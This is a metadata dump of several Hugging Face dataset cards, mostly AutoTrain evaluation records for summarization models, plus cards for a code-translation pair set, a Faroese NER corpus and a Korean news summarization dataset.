| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
32fba0b0ee59bc29ea13ff25f7029ca19b48f410 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-xsum-4118bb33-12145618 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:26:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["xsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "xsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "document", "target": "summary"}}} | 2022-08-01T12:41:09+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
6e28526de611e2cce102546dc19ee2aa5c4d9606 |
# statistics
cpp-java: 627 pairs
python-java: 616 pairs
cpp-python: 545 pairs
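
A hedged loading sketch — the Hub id is taken from this record, but configurations and column names are not documented here, so the code only inspects what is available:

```python
from datasets import load_dataset

# Hub id from this record; if the dataset defines multiple configurations
# (e.g. one per language pair), load_dataset may require a config name.
pairs = load_dataset("ziwenyd/transcoder-geeksforgeeks")
print(pairs)  # inspect splits, columns, and the pair counts listed above
```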
| ziwenyd/transcoder-geeksforgeeks | [
"license:mit",
"region:us"
] | 2022-08-01T08:28:39+00:00 | {"license": "mit"} | 2022-08-03T13:59:08+00:00 | [] | [] | TAGS
#license-mit #region-us
|
# statistics
cpp-java: 627 pairs
python-java: 616 pairs
cpp-python: 545 pairs
| [
"# statistics\n\ncpp-java: 627 pairs\n\npython-java: 616 pairs\n\ncpp-python: 545 pairs"
] | [
"TAGS\n#license-mit #region-us \n",
"# statistics\n\ncpp-java: 627 pairs\n\npython-java: 616 pairs\n\ncpp-python: 545 pairs"
] |
b48f43ffb8808a1d3797ad2f9c112fc743fc37a9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-b454c496-12155619 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:30:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-08-01T14:27:24+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
ddb7e90cba94406060a1ecf502017d244b5b14c2 |
This is FoNE, a Faroese NER corpus created by annotating the [Sosialurin corpus](https://huggingface.co/datasets/vesteinn/sosialurin-faroese-pos).
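
A minimal loading sketch — the Hub id `vesteinn/sosialurin-faroese-ner` is taken from this record, while the split and column names are assumptions to verify on first load:

```python
from datasets import load_dataset

# Hub id comes from this record; the "train" split is an assumption.
ds = load_dataset("vesteinn/sosialurin-faroese-ner")
print(ds)              # list the available splits and columns
print(ds["train"][0])  # one annotated sentence with its NER tags
```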
If you find this dataset useful, please cite
```
@inproceedings{snaebjarnarson-etal-2023-transfer,
title = "{T}ransfer to a Low-Resource Language via Close Relatives: The Case Study on Faroese",
author = "Snæbjarnarson, Vésteinn and
Simonsen, Annika and
Glavaš, Goran and
Vulić, Ivan",
booktitle = "Proceedings of the 24th Nordic Conference on Computational Linguistics (NoDaLiDa)",
month = "may 22--24",
year = "2023",
address = "Tórshavn, Faroe Islands",
publisher = {Link{\"o}ping University Electronic Press, Sweden},
}
``` | vesteinn/sosialurin-faroese-ner | [
"task_categories:token-classification",
"task_ids:named-entity-recognition",
"size_categories:1K<n<10K",
"language:fo",
"license:cc-by-4.0",
"region:us"
] | 2022-08-01T11:33:34+00:00 | {"language": ["fo"], "license": "cc-by-4.0", "size_categories": ["1K<n<10K"], "task_categories": ["token-classification"], "task_ids": ["named-entity-recognition"], "pretty_name": "FoNE"} | 2024-01-05T12:44:42+00:00 | [] | [
"fo"
] | TAGS
#task_categories-token-classification #task_ids-named-entity-recognition #size_categories-1K<n<10K #language-Faroese #license-cc-by-4.0 #region-us
|
This is FoNE, a Faroese NER corpus created by annotating the Sosialurin corpus.
If you find this dataset useful, please cite
| [] | [
"TAGS\n#task_categories-token-classification #task_ids-named-entity-recognition #size_categories-1K<n<10K #language-Faroese #license-cc-by-4.0 #region-us \n"
] |
cd0823496bbf167f176f6239a9ee8c0985247853 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: yhavinga/t5-v1.1-base-dutch-cnn-test
* Dataset: ml6team/cnn_dailymail_nl
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@yhavinga](https://huggingface.co/yhavinga) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-ml6team__cnn_dailymail_nl-a771a5f9-12165620 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T11:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["ml6team/cnn_dailymail_nl"], "eval_info": {"task": "summarization", "model": "yhavinga/t5-v1.1-base-dutch-cnn-test", "metrics": [], "dataset_name": "ml6team/cnn_dailymail_nl", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-08-01T12:47:31+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: yhavinga/t5-v1.1-base-dutch-cnn-test
* Dataset: ml6team/cnn_dailymail_nl
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @yhavinga for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: yhavinga/t5-v1.1-base-dutch-cnn-test\n* Dataset: ml6team/cnn_dailymail_nl\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @yhavinga for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: yhavinga/t5-v1.1-base-dutch-cnn-test\n* Dataset: ml6team/cnn_dailymail_nl\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @yhavinga for evaluating this model."
] |
fa6ec90a7beb96d182372f09b04b96797ea6588a | This is a custom dataset the author created by crawling Naver News (https://news.naver.com) for a Korean NLP model hands-on tutorial.
- Period: July 1, 2022 - July 10, 2022
- Subject: IT, economics
```
DatasetDict({
train: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 22194
})
test: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 2740
})
validation: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 2466
})
})
```
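
A hedged usage sketch — the Hub id and the column names below are taken from this card's `DatasetDict` printout:

```python
from datasets import load_dataset

# Load all three splits of the crawled Naver News corpus.
dataset = load_dataset("daekeun-ml/naver-news-summarization-ko")

# Each record pairs a news article ("document") with a reference "summary".
sample = dataset["train"][0]
print(sample["title"])
print(sample["document"][:200])  # first part of the article body
print(sample["summary"])         # reference summary
```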
---
license: apache-2.0
--- | daekeun-ml/naver-news-summarization-ko | [
"task_categories:summarization",
"size_categories:10K<n<100K",
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-08-01T13:54:17+00:00 | {"language": ["ko"], "license": "apache-2.0", "size_categories": ["10K<n<100K"], "task_categories": ["summarization"]} | 2023-01-10T11:12:44+00:00 | [] | [
"ko"
] | TAGS
#task_categories-summarization #size_categories-10K<n<100K #language-Korean #license-apache-2.0 #region-us
| This dataset is a custom dataset created by the author by crawling Naver News (URL) for the Korean NLP model hands-on.
- Period: July 1, 2022 - July 10, 2022
- Subject: IT, economics
---
license: apache-2.0
--- | [] | [
"TAGS\n#task_categories-summarization #size_categories-10K<n<100K #language-Korean #license-apache-2.0 #region-us \n"
] |